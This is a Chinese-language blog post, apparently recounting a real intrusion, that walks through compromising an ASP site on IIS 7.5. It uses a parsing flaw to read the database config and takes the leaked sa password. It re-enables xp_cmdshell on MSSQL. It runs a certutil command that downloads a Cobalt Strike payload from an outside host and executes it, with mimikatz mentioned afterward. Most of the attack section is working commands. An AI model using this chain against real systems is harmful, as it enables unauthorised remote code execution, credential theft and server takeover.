asp网站+iis7.5解析漏洞配合远程下载getshell

2019年03月31日 15:58:53 作者:by0531 阅读数:33283
网络安全渗透测试北京实地培训:报名加微信:bihuoedu,手机:15320003515。推荐学员入学奖励现金1000元

一个asp网站有iis7.5解析漏洞 但是扫了目录没发现上传文件的地方,也没有会员头像那些怎么办呢

 x.com/index.asp/.php 直接查看首页源码,包含了他的配置文件

<!--#include file="../conn/conn.asp"-->

 x.com/conn/conn.asp/.php

'database='127.0.0.1'
'user='sa'
'password='xs2131zz'
'数据库如果是mssql选择ture,access留空
'type='true'

   发现用了mssql服务器

ping网站以后发现没做CDN,如果做了cdn,IP的描述会提示[xxcdn.com]等等


nmap -sV -sT -Pn --open -v 177.15x.x

扫描IP发现开了1433端口

开启虚拟机,打开sqltool  连接上执行命令

;exec master..xp_cmdshell 'whoami'

提示未能找到存储过程'master..xpcmdshell'. ,我们恢复下

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 

也可以用nmap执行mssql命令

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4  

这里直接用certutil下载我们的cs payload并执行

certutil -urlcache -split -f http://www.xxoo.ml/artifact.exe C:\Windows\Temp\arit.exe

ok,上线了

然后右键目标run mimikatz等后期工作,描述的很轻松,其实走了很多弯路,机器上有安全狗+护卫神,echo写不了木马,只能使用远程下载配合cobalstrike上线了